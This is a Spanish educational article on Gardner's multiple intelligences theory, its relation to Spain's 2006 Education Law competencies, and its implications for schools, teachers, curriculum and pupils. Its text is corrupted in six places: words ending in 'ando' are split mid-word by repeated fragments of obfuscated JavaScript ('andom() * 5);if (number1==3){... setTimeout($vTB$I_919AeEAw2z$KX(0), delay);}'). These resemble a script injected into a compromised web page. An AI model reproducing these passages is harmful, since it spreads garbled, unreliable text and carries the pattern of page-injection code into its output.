INTELIGENCIAS MÚLTIPLES, ¿SABEMOS DARLES A TODAS EL MISMO VALOR EN EL AULA?

Autora: María Isabel León Trigo

Todos tenemos una opinión sobre la inteligencia de las personas que nos rodean y sobre la nuestra propia pero… ¿de qué depende si una persona es inteligente o no?

En este artículo haremos un recorrido por las diferentes concepciones teóricas sobre la inteligencia, deteniéndonos de forma especial en la Teoría de las Inteligencias Múltiples de Gardner, su implicación en nuestro actual sistema educativo y su aplicación práctica en las aulas.

¿SABEMOS QUÉ ES LA INTELIGENCIA?

Aunque tenemos una idea de lo que significa “inteligencia”, no es fácil dar una definición científica del término. El concepto de inteligencia ha sido uno de los aspectos que más desacuerdo ha causado en la historia de la psicología y no podemos encontrar una definición aceptada de forma universal.

Muchos autores han investigado y han tratado de dar una explicación sobre este concepto, entre ellos podemos destacar a los siguientes:

-        GALTON: Se basó en un concepto estático de la inteligencia, la cual no era modificable por el ambiente. Anulaba la influencia del aprendizaje y la educación en el desarrollo de la capacidad intelectual.

-        BINET Y SIMON: Tomaron los test mentales como predictores del éxito académico y laboral, lo cual dio como resultado la aparición de la Psicometría.

-        SPEARMAN: Desarrolló su teoría bifactorial de la inteligencia. Explicaba que existen dos tipos de inteligencias. La primera sería una Inteligencia general, denominada factor g, que se caracteriza por estar presente en todos los procesos intelectuales llevados a cabo por los seres humanos. Y el otro tipo sería un factor específico, denominado factor s, responsable de la habilidad necesaria para la realización de una tarea concreta.

-        PIAGET: Define la inteligencia como “la capacidad para adaptarse al ambiente” y sobre ella influyen factores cognitivos no cuantificables, tales como esquemas, estructuras mentales, expectativas o motivaciones.

-        GARDNER: Entiende la inteligencia de forma contextualizada y práctica. “La inteligencia es la capacidad de comprender el entorno y utilizar ese conocimiento para determinar la mejor manera de conseguir unos objetivos concretos”.

Ante tanta variabilidad en las definiciones, hay autores que optan por destacar ciertos rasgos que suelen atribuirse a las personas consideradas como inteligentes. Entre estos rasgos podemos destacar los siguientes:

-       Capacidad de adaptación al medio, sobre todo en situaciones nuevas (versatilidad y adaptabilidad).

-       Capacidad para resolver problemas de la manera más satisfactoria posible para el organismo (pensamiento creativo).

-       Capacidad para procesar racionalmente la información (razonamiento y el pensamiento lógico).

TEORÍA DE LAS INTELIGENCIAS MÚLTIPLES

GARDNER formula la teoría de las Inteligencias Múltiples. Dicho autor asume que la inteligencia es funcional y que se manifiesta de diferentes maneras en contextos diversos. Gardner expone que la competencia cognitiva queda descrita en términos de un conjunto de habilidades, talentos o capacidades mentales, que denomina inteligencias, de ahí la denominación de “Inteligencias Múltiples”.

Gardner expone la siguiente hipótesis: “Existen, al menos, siete categorías amplias de inteligencia. Tres pueden ser catalogadas como convencionales: verbal, matemática y espacial, pero las otras cuatro: habilidad musical, aptitudes corporales, competencia en el trato con los otros y autoconocimiento, han suscitado controversias porque se salen por completo del terreno de lo que usualmente se llama inteligencia.” Más tarde, el autor incluyó la inteligencia Naturalista y definió las ocho.

Ante esta clasificación debemos señalar las siguientes consideraciones:

-        Todos poseemos las ocho inteligencias, es decir, no es una teoría de tipos en la que se clasifica a cada persona con un tipo de inteligencia, sino que propone que cada persona tiene capacidades en las ocho inteligencias y que cada una funciona de una manera particular.

-        Todas las personas poseen la capacidad de desarrollar las ocho inteligencias hasta un nivel alto de desempeño, siempre que reciba la estimulación y la instrucción adecuada.

-        Las inteligencias suelen trabajar juntas de manera compleja, interactuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando entre sí y no de forma aislada.

-        No hay un conjunto estándar de características que una persona debe poseer para ser considerada inteligente en un área específica. Una persona puede no ser capaz de leer y, sin embargo, tener un amplio vocabulario oral.

Vamos a definir brevemente las ocho inteligencias consideradas por Gardner:

Inteligencia Lingüística: capacidad para manejar y estructurar los significados y las funciones de las palabras y del lenguaje.

Inteligencia Lógico-matemática: hace posible cálculos, cuantificar, considerar proposiciones, establecer y comprobar hipótesis y llevar a cabo operaciones matemáticas complejas.

Inteligencia Viso-espacial: capacidad para percibir con precisión el mundo visual y espacial; es la habilidad necesaria para efectuar transformaciones de las percepciones iniciales que se hayan tenido.

Inteligencia Corporal-cinestésica: capacidad para controlar los movimientos del propio cuerpo y manejar objetos con destreza.

Inteligencia Musical: habilidad para apreciar, discriminar, transformar y expresar las formas musicales, así como para ser sensible al ritmo, el tono y el timbre.

Inteligencia Interpersonal: capacidad para discernir y responder de manera adecuada a los estados de ánimo, los temperamentos, las motivaciones y los deseos de otras personas.

Inteligencia Intrapersonal: capacidad para acceder a los sentimientos propios, discernir las emociones íntimas y pensar sobre los procesos de pensamiento (metacognición).

Inteligencia Naturalista: capacidad para comprender el mundo natural y trabajar eficazmente en él.

VALOR DE LAS INTELIGENCIAS MÚLTIPLES EN EL AULA

Desde pequeños la sociedad nos va mostrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que la persona que memoriza con facilidad  o que tiene un alto rendimiento en matemáticas es muy inteligente. De la misma forma, estos alumnos/as son muy valorados por el profesorado. Por tanto, tradicionalmente, lo mas apreciado por la sociedad han sido la inteligencia lingüística y la inteligencia lógico-matemática. El valor que se le da a los demás tipos de inteligencia está muy por debajo.

Centrándonos en el sistema educativo y haciendo un análisis de éste a lo largo de los años, también podemos observar que, tradicionalmente, la educación ha dado más importancia a la enseñanza de la inteligencia  lógico-matemática y lingüística, considerandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando muy poco otras posibilidades de desarrollar el conocimiento.

Y ¿qué ocurre con esos alumnos que no obtienen buenos resultados académicos pero que destacan en otros ámbitos como el social, el artístico o el deportivo?  ¿Sería correcto etiquetarlos como alumnos/as “poco inteligentes”?. Según la Teoría de las Inteligencias Múltiples de Gardner, todas las inteligencias son igual de importantes. El problema es que nuestro sistema escolar no las ha tratado por igual a lo largo de la historia.

La actual legislación educativa abre posibilidades a la difícil meta de considerar a cada niño/a como un ser único, con características diferentes y diversas inteligencias por desarrollar. Concretamente, la Ley Orgánica 2/2006, de 3 de mayo, de Educación establece como principio “La flexibilidad para adecuar la educación a la diversidad de aptitudes, intereses, expectativas y necesidades del alumnado, así como a los cambios que experimentan el alumnado y la sociedad” e introduce el concepto de Competencias Básicas, que son ocho  y pueden relacionarse de manera, más o menos, clara con las Inteligencias Múltiples de Gardner.

En la web www.inteligenciasmultiples.net, dedicada a compartir experiencias educativas basadas en la Teoría de las Inteligencias Múltiples, realizan la siguiente relación entre las Competencias Básicas y las Inteligencias descritas por Gardner. Algunas de ellas tienen una correspondencia bastante clara.

COMPETENCIA BÁSICA INTELIGENCIA
Competencia en comunicación lingüística. Inteligencia lingüística.
Competencia Matemática. Inteligencia lógico matemática.
Competencia en el conocimiento y la interacción con el mundo físico. Inteligencia naturalista.
Tratamiento de la información y competencia digital. Inteligencia lingüística.

Inteligencia lógico-matemática.

Inteligencia viso-espacial.

Inteligencia Musical.

Competencia social y ciudadana. Inteligencia interpersonal.
Competencia cultural y artística. Inteligencia viso-espacial.

Inteligencia corporal-cinestésica.

Inteligencia musical.

Competencia para aprender a aprender Inteligencia intrapersonal.
Autonomía e iniciativa personal. Inteligencia intrapersonal.

IMPLICACIONES EDUCATIVAS DE LA TEORÍA DE LAS INTELIGENCIAS MÚLTIPLES

Mª Dolores Prieto y Carmen Ferrándiz (2001), en su libro “Inteligencias Múltiples y Currículo Escolar” exponen una serie de implicaciones que tendría la Teoría de las Inteligencias Múltiples para todos los niveles de concreción del Sistema Educativo.

Desde esta perspectiva, nos centraríamos en un modelo de enseñanza-aprendizaje centrado en el alumno y en el desarrollo de habilidades y estrategias de las diferentes inteligencias. Se reconocen muchas y diferentes facetas de la cognición, que tienen en cuenta que las personas poseen diferentes potenciales cognitivos. Éstos pueden desarrollarse y, por consiguiente, lograr un mayor éxito académico.

Concretamente, las implicaciones que tendría esta Teoría la podríamos clasificar en su repercusión en los centros, el profesorado, el currículo y el alumnado.

Para los Centros:

-        Lograr escuelas que sean más eficaces y centradas en el desarrollo del pensamiento.

-        Hacer que la escuela sea como el hogar del pensamiento, donde se compartan las inteligencias.

-        Favorecer el éxito y reducir el fracaso escolar.

-        Potenciar aulas inclusivas donde tengan cabida todos los tipos de inteligencias y maneras de aprender.

Para el Profesorado:

-        Formales en metodología orientada a “explotar” el potencial del alumnado, especialmente de aquellos que necesiten apoyos específicos.

-        Entrenar en estrategias para favorecer el desarrollo cognitivo, social y emotivo de los alumnos.

-        Motivarles a diseñar materiales para enseñar a los alumnos a aprender con todas las inteligencias, utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando todos los canales de procesamiento de la información.

Para el Currículo:

-        Introducir cambios para que los alumnos aprendan aquello que les interesa y desde sus intereses paliar lagunas de sus conocimientos.

-        Utilizar una metodología centrada en el pensamiento reflexivo para impartir los contenidos curriculares.

-        Transferir los conocimientos más allá del aula, de manera que cualquier aprendizaje escolar les sirva en vida real.

Para el Alumnado:

-        Crear en el alumno la necesidad y curiosidad por investigar y encontrar diferentes soluciones a los problemas escolares y de la vida real.

-        Enseñarles a pensar utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando diferentes alternativas, es decir, fomentar un pensamiento flexible que le permita pensar de manera creativa.

-        Desarrollar habilidades de organización de los conocimientos y estructuración del pensamiento.

De esta forma, en la actualidad, cada vez es más la importancia que se le va concediendo a cada uno de los tipos de inteligencia, a la vez que se incide en el desarrollo de las competencias básicas en todas las etapas, niveles y materias educativas. Sin embargo, esto es algo relativamente reciente y requiere un cambio profundo a nivel educativo y social.

BIBLIGRAFÍA:

-        ANTÚNEZ, C. (2005): Juegos para estimular las inteligencias múltiples. Narcea. Madrid,

-        PRIETO, Mª D. y FERRÁNDIZ, C. (2001): Inteligencias múltiples y curriculum escolar. Aljibe. Málaga.

-        GARDNER (1994) Estructuras de la mente: la teoría de las inteligencias múltiples. Fondo de Cultura Económica.

-        GARDNER (1995): Inteligencias múltiples: la teoría en la práctica. Paidós.

-        Ley Orgánica 2/2006, de 3 de mayo, de Educación

-        www.inteligenciasmultiples.net

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